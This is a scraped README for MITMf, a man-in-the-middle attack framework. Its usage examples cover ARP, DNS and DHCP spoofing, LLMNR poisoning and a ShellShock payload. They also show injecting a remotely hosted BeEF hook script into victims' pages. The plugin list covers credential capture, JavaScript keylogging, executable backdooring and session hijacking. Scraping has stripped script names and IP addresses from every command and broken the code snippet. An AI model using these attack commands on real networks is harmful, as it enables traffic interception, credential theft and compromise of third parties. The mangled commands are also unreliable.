Framework for Man-In-The-Middle attacks
Python JavaScript Other
Latest commit 0e81e40 Dec 13, 2016 @byt3bl33d3r committed on GitHub Merge pull request #254 from onedv/master
Captive portal redirecting using 302

Supported Python versions Latest Version Supported OS Code Climate Build Status Coverage Status


Framework for Man-In-The-Middle attacks

Quick tutorials, examples and developer updates at:

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the relevant section in the wiki .


Please refer to the wiki for installation instructions


MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.


  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.

  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.

  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.

  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.

  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):'Got an ICMP packet!')
    packet.dst = ''
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python -F ~/

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!


The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python -i enp3s0

ARP poison the whole subnet with the gateway at using the Spoof plugin:

python -i enp3s0 --spoof --arp --gateway

Same as above + a WPAD rogue proxy server using the Responder plugin:

python -i enp3s0 --spoof --arp --gateway --responder --wpad

ARP poison and with the gateway at

python -i enp3s0 --spoof --arp --target, --gateway

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python -i enp3s0 --spoof --dns --arp --target --gateway

Enable LLMNR/NBTNS/MDNS spoofing:

python -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python -i enp3s0 --inject --html-url

Inject a JS script:

python -i enp3s0 --inject --js-url http://beef:3000/hook.js

Start a captive portal that redirects everything to http://SERVER/PATH:

python -i enp3s0 --spoof --arp --gateway --captive --portalurl http://SERVER/PATH

Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:

python -i enp3s0 --spoof --arp --gateway --captive

Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):

python -i enp3s0 --spoof --arp --gateway --dns --captive --use-dns

Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):

python -i enp3s0 --spoof --arp --gateway --captive --portaldir LOCALDIR

Same as above but with hostname:

python -i enp3s0 --spoof --arp --gateway --dns --captive --portaldir LOCALDIR --use-dns

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python --help

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the 'SMB Trap' vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client's OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transperently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client's webpages
  • Replace : Replace arbitrary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees
  • Captive : Creates a captive portal, redirecting HTTP requests using 302